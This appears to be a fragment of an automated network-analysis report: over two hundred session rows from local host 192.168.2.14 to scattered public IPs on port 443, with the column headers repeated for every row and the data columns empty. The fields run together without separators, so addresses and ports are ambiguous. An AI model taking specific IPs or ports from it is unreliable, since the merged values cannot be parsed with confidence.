                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16279192.168.2.146036879.28.224.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16280192.168.2.144934861.161.181.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16281192.168.2.1447120154.3.194.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16282192.168.2.1433722183.7.38.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16283192.168.2.1451040136.179.118.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16284192.168.2.1458668222.76.37.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16285192.168.2.1442612106.115.141.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16286192.168.2.1447982123.139.247.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16287192.168.2.1441076185.56.109.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16288192.168.2.1448360169.143.8.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16289192.168.2.14510941.39.65.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16290192.168.2.1445040178.65.252.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16291192.168.2.145752846.136.191.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16292192.168.2.1440378103.83.17.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16293192.168.2.1460960131.231.154.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16294192.168.2.1451392141.204.96.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16295192.168.2.1450608163.14.134.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16296192.168.2.1451786197.177.109.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16297192.168.2.1449716221.48.49.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16298192.168.2.1444288144.235.175.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16299192.168.2.144977081.101.62.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16300192.168.2.144377646.227.102.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16301192.168.2.1443682156.33.27.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16302192.168.2.1446798217.106.80.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16303192.168.2.1434138101.199.134.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16304192.168.2.1441148118.182.218.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16305192.168.2.1459644104.88.128.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16306192.168.2.145916854.144.62.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16307192.168.2.1454440112.8.127.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16308192.168.2.1439174169.65.207.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16309192.168.2.1436096217.91.30.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16310192.168.2.1445018138.179.32.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16311192.168.2.1456738108.86.183.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16312192.168.2.1452176200.82.7.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16313192.168.2.1458084223.10.188.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16314192.168.2.145529077.146.195.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16315192.168.2.1445844220.120.14.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16316192.168.2.1441338216.90.249.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16317192.168.2.1456830129.243.189.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16318192.168.2.1450958190.207.103.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16319192.168.2.1449902160.80.204.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16320192.168.2.145771689.34.58.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16321192.168.2.145743690.183.252.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16322192.168.2.1434916175.148.176.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16323192.168.2.1441136222.247.52.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16324192.168.2.1451686154.236.211.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16325192.168.2.1444346128.102.239.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16326192.168.2.143479223.118.32.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16327192.168.2.1434184136.203.2.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16328192.168.2.1457128201.204.103.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16329192.168.2.1457388219.249.154.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16330192.168.2.1435066210.5.29.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16331192.168.2.144234878.138.45.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16332192.168.2.1435468157.31.18.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16333192.168.2.1459420149.114.170.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16334192.168.2.146057897.218.190.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16335192.168.2.1441954110.26.114.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16336192.168.2.144241225.126.79.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16337192.168.2.143521664.92.255.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16338192.168.2.1446252200.178.211.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16339192.168.2.145612089.149.12.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16340192.168.2.1452920124.188.90.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16341192.168.2.1458926153.93.137.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16342192.168.2.1440940171.116.4.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16343192.168.2.1432962120.192.89.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16344192.168.2.1457484108.203.19.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16345192.168.2.143674475.188.5.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16346192.168.2.145337442.162.52.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16347192.168.2.1452158168.150.95.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16348192.168.2.145642442.187.242.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16349192.168.2.1443004146.206.164.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16350192.168.2.1458106169.164.63.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16351192.168.2.145430424.149.30.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16352192.168.2.1444798183.55.57.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16353192.168.2.1435584208.123.175.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16354192.168.2.145548894.208.42.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16355192.168.2.144801242.183.20.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16356192.168.2.143328861.148.21.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16357192.168.2.1441074125.167.94.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16358192.168.2.14564642.131.14.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16359192.168.2.1439516201.74.79.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16360192.168.2.1442572201.216.4.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16361192.168.2.14382464.142.83.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16362192.168.2.143501443.220.45.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16363192.168.2.1445186146.239.67.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16364192.168.2.144475257.107.237.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16365192.168.2.144962236.175.255.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16366192.168.2.144370260.170.136.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16367192.168.2.1449674179.148.87.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16368192.168.2.1448110133.99.231.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16369192.168.2.144333482.198.247.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16370192.168.2.1441438141.125.221.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16371192.168.2.1454712178.123.17.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16372192.168.2.1457100167.98.119.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16373192.168.2.144684419.10.106.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16374192.168.2.1452240147.72.87.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16375192.168.2.1458242120.213.65.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16376192.168.2.145585662.249.151.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16377192.168.2.1452754137.174.5.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16378192.168.2.1435488103.125.140.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16379192.168.2.1445332179.134.167.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16380192.168.2.144656423.149.197.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16381192.168.2.143562297.0.188.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16382192.168.2.1453250103.227.219.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16383192.168.2.1439824126.136.86.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16384192.168.2.144871061.91.150.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16385192.168.2.1458556104.19.136.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16386192.168.2.144381254.221.43.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16387192.168.2.144601819.157.199.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16388192.168.2.1458744207.79.29.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16389192.168.2.146050054.27.62.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16390192.168.2.1441088136.222.168.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16391192.168.2.1438492141.46.78.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16392192.168.2.1442166138.141.64.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16393192.168.2.144932636.186.24.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16394192.168.2.145711269.238.68.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16395192.168.2.1446814157.36.93.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16396192.168.2.1449322221.177.214.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16397192.168.2.1457440101.60.103.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16398192.168.2.146028231.148.157.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16399192.168.2.144810824.215.136.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16400192.168.2.1435762176.102.233.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16401192.168.2.1434764196.216.227.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16402192.168.2.145075017.245.5.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16403192.168.2.144100892.135.34.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16404192.168.2.143641032.95.225.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16405192.168.2.1452858167.25.188.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16406192.168.2.1454524149.145.57.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16407192.168.2.144747476.39.141.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16408192.168.2.145696249.200.220.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16409192.168.2.1460284203.1.222.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16410192.168.2.1434672145.153.147.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16411192.168.2.1443770132.183.254.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16412192.168.2.1438498161.85.255.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16413192.168.2.1433274143.173.141.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16414192.168.2.1443392142.4.169.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16415192.168.2.143736286.182.195.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16416192.168.2.1444578117.134.69.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16417192.168.2.1448186198.58.255.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16418192.168.2.144119019.164.184.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16419192.168.2.1449040109.236.57.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16420192.168.2.144895043.247.26.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16421192.168.2.1453174113.95.0.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16422192.168.2.1443326137.116.225.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16423192.168.2.1438414150.93.252.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16424192.168.2.144263892.169.11.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16425192.168.2.144279251.55.13.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16426192.168.2.144667272.163.79.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16427192.168.2.1434468167.87.230.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16428192.168.2.144198491.185.171.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16429192.168.2.145795659.208.193.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16430192.168.2.144129854.206.132.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16431192.168.2.1452880124.100.187.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16432192.168.2.1450362117.154.213.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16433192.168.2.1434164191.24.72.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16434192.168.2.1440180139.59.73.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16435192.168.2.145897684.9.51.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16436192.168.2.143538670.242.153.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16437192.168.2.143968291.185.230.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16438192.168.2.145479876.185.108.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16439192.168.2.1460076186.116.96.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16440192.168.2.1443978121.75.139.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16441192.168.2.143804825.217.13.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16442192.168.2.14484422.21.141.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16443192.168.2.1456920142.253.73.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16444192.168.2.14372224.177.97.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16445192.168.2.1440250177.241.114.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16446192.168.2.1453814114.179.182.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16447192.168.2.143525683.76.156.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16448192.168.2.1449804176.49.19.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16449192.168.2.144762081.91.136.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16450192.168.2.1451948203.224.69.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16451192.168.2.1437750220.133.205.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16452192.168.2.1435804131.192.40.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16453192.168.2.1458484182.22.66.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16454192.168.2.1448212213.42.188.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16455192.168.2.143674845.141.180.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16456192.168.2.143678071.100.136.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16457192.168.2.1437808166.170.209.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16458192.168.2.1451702191.232.9.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16459192.168.2.1441482149.135.94.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16460192.168.2.1447562166.12.223.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16461192.168.2.1444174109.179.127.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16462192.168.2.1436890126.146.61.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16463192.168.2.145798676.30.155.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16464192.168.2.143544275.148.88.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16465192.168.2.1438638197.7.4.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16466192.168.2.1435032113.33.61.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16467192.168.2.1441192106.77.137.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16468192.168.2.1455204207.128.184.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16469192.168.2.1452846109.116.150.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16470192.168.2.146098671.103.125.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16471192.168.2.1442850134.82.106.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16472192.168.2.145981873.85.127.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16473192.168.2.145606889.36.119.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16474192.168.2.1451808190.76.25.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16475192.168.2.1433900129.91.89.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16476192.168.2.1446778191.138.187.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16477192.168.2.145235051.20.114.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16478192.168.2.1433974213.43.20.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16479192.168.2.1447272170.187.158.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16480192.168.2.1434610128.28.115.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16481192.168.2.144198471.12.207.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16482192.168.2.1444768185.208.23.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16483192.168.2.1433618143.240.102.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16484192.168.2.1445154126.174.20.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16485192.168.2.1433986119.147.217.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16486192.168.2.1435378184.100.106.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16487192.168.2.1447146199.143.195.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16488192.168.2.1455872161.38.210.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16489192.168.2.144328417.251.191.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16490192.168.2.144209034.25.180.234443
                                                        TimestampBytes transferredDirectionData


